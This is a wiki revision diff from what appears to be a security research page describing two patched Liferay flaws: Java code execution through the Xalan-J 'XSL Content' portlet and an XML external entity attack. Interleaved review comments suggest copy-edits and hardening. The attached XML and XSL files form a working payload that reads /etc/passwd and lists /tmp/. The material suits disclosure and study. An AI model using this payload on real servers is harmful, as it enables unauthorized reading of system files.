Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05

From version 6.1
edited by Nicolas Gregoire
on 2012/01/13 14:04
Change comment: There is no comment for this version
To version 19.1
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version

Details

Page properties
Tags
... ... @@ -1,0 +1,1 @@
1 +liferay|java|xalan-j|code execution|xee
Content
... ... @@ -4,14 +4,18 @@
4 4  
5 5  
6 6  
7 +The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]).
7 7  
8 -
9 -
10 10  == Java code execution ==
11 11  
12 12  LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_Saxon]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
13 13  
14 14  
14 +
15 +Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) :
16 +
17 +[[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
18 +
15 15  == Additional vulnerabilities ==
16 16  
17 17  Two others vulnerabilities were identified in the "XSL Content" portlet :
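Review bot: the wiki link on line 12, `[[Xalan-J>>Engine_Saxon]]`, sends the reader to the Saxon engine page, while the added line 15 links the same engine name to `[[Xalan-J>>Engine_XalanJ]]`; the first link should target `Engine_XalanJ` as well. While touching the block, fix the typos that survive this revision: "LIferay" to "Liferay", "a XML document" to "an XML document", "can probably modified" to "can probably be modified", "that's an easy to exploit vulnerability" to "that is an easy-to-exploit vulnerability", and "Two others vulnerabilities" (line 17) to "Two other vulnerabilities".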
... ... @@ -20,6 +20,11 @@
20 20  
21 21  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
22 22  
23 -Reading /etc/passwd using CVE-2011-1502 :
24 24  
28 +
29 +
30 +
31 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 +
33 +
25 25  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
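Review bot: lines 28-30 and 32-33 add five blank lines around the reinstated "Reading /etc/passwd" caption, which opens a large gap between the CVE-2011-1502 bullet and the screenshot; one blank line on each side matches the spacing used in the rest of the page. In the caption itself, "cf attached files" should read "cf. attached files", consistent with "cf. the Release Notes" on line 7 of the previous hunk.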
liferay-xee.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +184 bytes
Content
... ... @@ -1,0 +1,9 @@
1 +<!DOCTYPE doc [
2 +<!ENTITY boom1 SYSTEM "/etc/passwd">
3 +<!ENTITY boom2 SYSTEM "/tmp/">
4 +]>
5 +<doc>
6 +<response><file>&boom1;</file></response>
7 +<response><file>&boom2;</file></response>
8 +</doc>
9 +
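Review bot: the two `SYSTEM` entities on lines 2-3 resolve to the file `/etc/passwd` and the directory `/tmp/`, which are the file-read and directory-listing cases the Content hunk attributes to CVE-2011-1502, but nothing in the attachment says so; a one-line XML comment naming the CVE and the 6.0.6 GA fix would make the file self-describing for anyone who downloads it without the page. On the parser side, the corresponding hardening is to reject external general entities (and external DTD loading) for user-supplied XML in the portlet.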
liferay-xee.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +319 bytes
Content
... ... @@ -1,0 +1,12 @@
1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 +<xsl:template match="/doc">
3 + <html><body>
4 + <xsl:for-each select="response">
5 + <h2>File content :</h2>
6 + <xsl:value-of select="file"/>
7 + <hr/>
8 + </xsl:for-each>
9 + </body></html>
10 +</xsl:template>
11 +</xsl:stylesheet>
12 +
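Review bot: the `<h2>File content :</h2>` heading on line 5 is identical for every `response`, so the output for `boom1` (a file) and `boom2` (a directory) cannot be told apart in the screenshot; including `<xsl:value-of select="position()"/>` in the heading, or naming the source in the XML and selecting it here, would label each block. The space before the colon in "File content :" is French typography and should be dropped to match the page's English text.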